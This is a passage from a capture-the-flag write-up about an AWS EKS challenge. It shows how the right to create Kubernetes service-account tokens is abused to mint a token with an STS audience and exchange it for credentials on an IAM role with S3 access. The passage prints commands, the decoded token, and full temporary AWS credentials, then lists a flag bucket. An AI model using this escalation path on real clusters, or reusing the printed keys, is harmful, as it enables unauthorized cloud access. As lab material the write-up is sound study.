      creationTimestamp: "2023-10-31T20:07:34Z"
      name: s3access-sa
      namespace: challenge5
      resourceVersion: "671916"
      uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda

This is where s3access-sa shows up, annotated with the challengeEksS3Role role ARN.

    "serviceaccounts/token": [
        "create"
    ]

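Because the trust policy requires `......:aud": "sts.amazonaws.com"`, the `--audience` parameter has to be added; otherwise the token's aud becomes kubernetes.default.svc (as in the decoded JSON further down).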

    kubectl create token debug-sa --audience=sts.amazonaws.com

Decoding the returned token shows the issuer oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589, which matches the Federated principal in the trust policy.

    {
      "aud": [
        "https://kubernetes.default.svc"
      ],
      "exp": 1724169226,
      "iat": 1724165626,
      "iss": "https://oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
      "kubernetes.io": {
        "namespace": "challenge5",
        "serviceaccount": {
          "name": "debug-sa",
          "uid": "6cb6024a-c4da-47a9-9050-59c8c7079904"
        }
      },
      "nbf": 1724165626,
      "sub": "system:serviceaccount:challenge5:debug-sa"
    }
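The decoding step itself is not shown in the writeup. One way to do it locally, sketched here with a hypothetical `jwt_payload` helper and assuming a `base64` that accepts `-d` (GNU coreutils), is to take the middle segment of the token, convert it from base64url to standard base64, and restore the padding:

```shell
#!/usr/bin/env bash
# Print the decoded payload (claims JSON) of a JWT. No signature verification.
jwt_payload() {
  local token="$1" payload
  # Second dot-separated segment, with base64url characters mapped back to base64.
  payload="$(printf '%s' "$token" | cut -d. -f2 | tr '_-' '/+')"
  # base64url omits padding; add '=' until the length is a multiple of 4.
  while (( ${#payload} % 4 != 0 )); do payload+="="; done
  printf '%s' "$payload" | base64 -d
}
```

Comparing the `aud` claim of a token created with and without `--audience=sts.amazonaws.com` makes the difference described above visible.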

So this token can be exchanged for credentials on the role ARN attached to s3access-sa.

    aws sts assume-role-with-web-identity \
      --role-arn "arn:aws:iam::688655246681:role/challengeEksS3Role" \
      --role-session-name "telll" \
      --web-identity-token "$TOKEN"

    {
      "Credentials": {
        "AccessKeyId": "ASIA2AVYNEVMSACJTGYX",
        "SecretAccessKey": "XSMdJ8laeh74tErInb9evSJ32WwAGSIt4OSWIwC1",
        "SessionToken": "IQoJb3JpZ2luX2VjEFcaCXVzLXdlc3QtMSJGMEQCIByKs7QHjGywult4KlQnRbhKX1IhYAtStXPtmdk2ghEUAiAXuLLENIk6tRqlh+PKBao+0EzksZ5Sf5CfpyNMFvD1XSq2BAhgEAEaDDY4ODY1NTI0NjY4MSIMAQC1lIc+GhvkWc95KpMEgKLtkSNdrrxWZ9EustoCYNLj0XFKPpMPUOBTsgcCr1JrsV6x2uSVBb74AQy2RhMFSPNo2WFtor/GO8KCK2q4wI8QsEwZDzZ7huUQhS2nBznMkK/eELFCZsvs7a30WuK9fge55pfoZmWhySgx20l1elxcbAKbAtuD4ZvwdK1WpGydgcurEYBMfkG4Y0394HvG59VJI592OtUvS7DmVEXXehgXYvdmkxYhUkm//PMe4ooVweslEMamKo8nksJ5S4xw63KLVp5qIjN/9nCpy7GFLP3nLbLgX2fbRxhWpG7WiQccuyqjmzpRGm6W4ky8EHkunHfDzfTH4TWSfZ9pUVnIVD2Y7d3O+3BysKRUTnPNC0f8ypSNcClBbs6qCdH4h2yHZ3CIG7fpxorIkDaGfD3J1QfR7T03dMvMZ/e/bIl43L1maAQIlAhH65l8/qphV5bbj4NvuTen/AvlPx5EYmA78iU68AOOIBSMLv6+nkbGQUOmgdNVBQeDn46+RGex7HEv3z6YvQNMEgnYnknGKT16PIN1ycnbIFhxO42s6Fiqim29KwpV4z7evFluBmjBxpkQ9BF4sNq8mRp65h6PNSpM+Ovf7fNoqRpsBeJbQxrp72Np0cemCPEVOwBrc0xxoGLH0zPMHaCJ6yFBVxzXhR30IcriXd/kNihhOhqpu0JY87zlRUfVVsLYQrKUN8efe78H7h2yMLjikrYGOpYBGPFTvTEbKaqouwLZAaqmxpGwkMf9te6hV4jXebv9faZWC6Lb/KPt+yVKFWJwfLbE/s7gcRYf78VFoF3QT1Ko4WbnnuRUL9uFxHqjKbU+vf33xfhbBG2LDvfdFtUwLxZGsl8gRcn+hakBPYdUud2Mp/qp9yxZhAynJNDaAANTL6/fSeE3CITVDVpayPWOOf4s0U1lEPkW",
        "Expiration": "2024-08-20T16:07:36+00:00"
      },
      "SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
      "AssumedRoleUser": {
        "AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:telll",
        "Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/telll"
      },
      "Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
      "Audience": "sts.amazonaws.com"
    }

    export AWS_ACCESS_KEY_ID="ASIA2AVYNEVMSACJTGYX"
    export AWS_SECRET_ACCESS_KEY="XSMdJ8laeh74tErInb9evSJ32WwAGSIt4OSWIwC1"
    export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEFcaCXVzLXdlc3QtMSJGMEQCIByKs7QHjGywult4KlQnRbhKX1IhYAtStXPtmdk2ghEUAiAXuLLENIk6tRqlh+PKBao+0EzksZ5Sf5CfpyNMFvD1XSq2BAhgEAEaDDY4ODY1NTI0NjY4MSIMAQC1lIc+GhvkWc95KpMEgKLtkSNdrrxWZ9EustoCYNLj0XFKPpMPUOBTsgcCr1JrsV6x2uSVBb74AQy2RhMFSPNo2WFtor/GO8KCK2q4wI8QsEwZDzZ7huUQhS2nBznMkK/eELFCZsvs7a30WuK9fge55pfoZmWhySgx20l1elxcbAKbAtuD4ZvwdK1WpGydgcurEYBMfkG4Y0394HvG59VJI592OtUvS7DmVEXXehgXYvdmkxYhUkm//PMe4ooVweslEMamKo8nksJ5S4xw63KLVp5qIjN/9nCpy7GFLP3nLbLgX2fbRxhWpG7WiQccuyqjmzpRGm6W4ky8EHkunHfDzfTH4TWSfZ9pUVnIVD2Y7d3O+3BysKRUTnPNC0f8ypSNcClBbs6qCdH4h2yHZ3CIG7fpxorIkDaGfD3J1QfR7T03dMvMZ/e/bIl43L1maAQIlAhH65l8/qphV5bbj4NvuTen/AvlPx5EYmA78iU68AOOIBSMLv6+nkbGQUOmgdNVBQeDn46+RGex7HEv3z6YvQNMEgnYnknGKT16PIN1ycnbIFhxO42s6Fiqim29KwpV4z7evFluBmjBxpkQ9BF4sNq8mRp65h6PNSpM+Ovf7fNoqRpsBeJbQxrp72Np0cemCPEVOwBrc0xxoGLH0zPMHaCJ6yFBVxzXhR30IcriXd/kNihhOhqpu0JY87zlRUfVVsLYQrKUN8efe78H7h2yMLjikrYGOpYBGPFTvTEbKaqouwLZAaqmxpGwkMf9te6hV4jXebv9faZWC6Lb/KPt+yVKFWJwfLbE/s7gcRYf78VFoF3QT1Ko4WbnnuRUL9uFxHqjKbU+vf33xfhbBG2LDvfdFtUwLxZGsl8gRcn+hakBPYdUud2Mp/qp9yxZhAynJNDaAANTL6/fSeE3CITVDVpayPWOOf4s0U1lEPkW"
    export AWS_DEFAULT_REGION="us-west-1"

    aws s3 ls challenge-flag-bucket-3ff1ae2